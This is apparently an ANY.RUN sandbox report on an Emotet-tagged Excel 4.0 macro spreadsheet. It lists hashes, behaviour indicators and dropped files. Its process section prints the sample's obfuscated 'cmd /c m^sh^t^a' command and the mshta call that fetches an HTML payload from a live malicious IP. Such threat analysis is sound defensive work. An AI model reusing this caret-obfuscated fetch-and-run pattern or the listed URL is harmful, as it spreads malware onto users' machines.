analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls

Full analysis: https://app.any.run/tasks/fdeebefd-6dcd-499f-bc68-c12a2a39917e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: January 25, 2022, 03:52:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros40
emotet-doc
emotet
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 20 19:00:43 2022, Last Saved Time/Date: Thu Jan 20 19:07:37 2022, Security: 0
MD5:

3F7F1F6050609317474B8F48EFA00E88

SHA1:

C95BFBC3794A4371D3B5A6702052D662DEE19A15

SHA256:

ADE5C2C45C5BBAE939364326AE43A74C8B0C93307B7C653B12B80CBE8E891B70

SSDEEP:

1536:bpEk3hbdlylKsgqopeJBWhZFGkE+cL2NdA8eXZiozeOgXVZKyaZpvyR1kZkJvU+:bCk3hbdlylKsgqopeJBWhZFGkE+cL2Nr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 1164)

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 1164)

  • SUSPICIOUS

    • Reads default file associations for system extensions

      • EXCEL.EXE (PID: 1164)

    • Checks supported languages

      • mshta.exe (PID: 2152)
      • cmd.exe (PID: 3708)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 3708)

    • Reads the computer name

      • mshta.exe (PID: 2152)

    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 2152)

  • INFO

    • Checks supported languages

      • EXCEL.EXE (PID: 1164)

    • Reads the computer name

      • EXCEL.EXE (PID: 1164)

    • Creates files in the user directory

      • EXCEL.EXE (PID: 1164)

    • Reads internet explorer settings

      • mshta.exe (PID: 2152)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1164)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

HeadingPairs:
  • Worksheets
  • 2
  • Excel 4.0 Macros
  • 1
TitleOfParts:
  • Sheet2
  • Sheet1
  • BLC
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: -
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2022:01:20 19:07:37
CreateDate: 2022:01:20 19:00:43
Software: Microsoft Excel
LastModifiedBy: xXx
Author: xXx
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs mshta.exe

Process information

PID
CMD
Path
Indicators
Parent process
1164"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3708cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.htmlC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2152mshta http://0xb907d607/fer/fe2.htmlC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Total events
2 430
Read events
2 172
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
32
Text files
1
Unknown types
12

Dropped files

PID
Process
Filename
Type
1164EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE487.tmp.cvr
MD5:
SHA256:
1164EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:105A209345F69A8DF243BCB9A739ABC2
SHA256:C114D70146ED4D9DA72D86BD4E967168433A825020139060BC3E630F58DE83C9
1164EXCEL.EXEC:\Users\admin\Desktop\D6AC2B40.tmpdocument
MD5:B190218C36DB36114DAB4E836170131E
SHA256:F1418C934F7368EC9E6A9C087D21B8D4A96CE38B4664E3913667C7520C460EDA
1164EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls.LNKlnk
MD5:93CB5754D664FC4A18903959C17052DF
SHA256:0B66AFB12D6553E59333A51D8805AD713A9FF705CA5931AD6F5F658333B0638E
1164EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF42D55C9C34756D7B.TMPatn
MD5:CDFB84B601CD88D28A25B871ABD3BEC1
SHA256:DEA75B3664ECD4E1AA6329704610C7712C90633D8BF552F00724A2FF372C4C3E
1164EXCEL.EXEC:\Users\admin\Desktop\D5261000document
MD5:F10B421D2F1DEB516C9EAC7E74479F36
SHA256:ACF8E2A435F3D301A02AB10323E962CE51391A46A0A6ABF15E59AD93D93E44ED
1164EXCEL.EXEC:\Users\admin\Desktop\C1D41000document
MD5:243C75A60C893418089985B52F2FE747
SHA256:A55E33F9E07C4A587A65D5A18164EDD6E83EB7F6A4D8B604A9A987C5E00A44EB
1164EXCEL.EXEC:\Users\admin\Desktop\B939B241.tmpdocument
MD5:8398476702D89E9CBC79BDC08502319F
SHA256:561C22B8A7A099F4E3AAEF9C7982E2BC03FFBF967A30061F08A43BB828ABC3BC
1164EXCEL.EXEC:\Users\admin\Desktop\F0F41000document
MD5:30FD23FD26490739BFAD304A66C762EE
SHA256:000B1E34023116719FFD74DCAF284796E28CA3045CF49922ADF1DA969A5F85C1
1164EXCEL.EXEC:\Users\admin\Desktop\CD4CF34E.tmpdocument
MD5:E4C54ACE7D54136347B3040CB5B99D85
SHA256:680A76CFFAB866B28347B524BDB960230C977BEB3364EC9E48FB6D4832EE3100
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2152
mshta.exe
GET
185.7.214.7:80
http://185.7.214.7/fer/fe2.html
FR
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2152
mshta.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls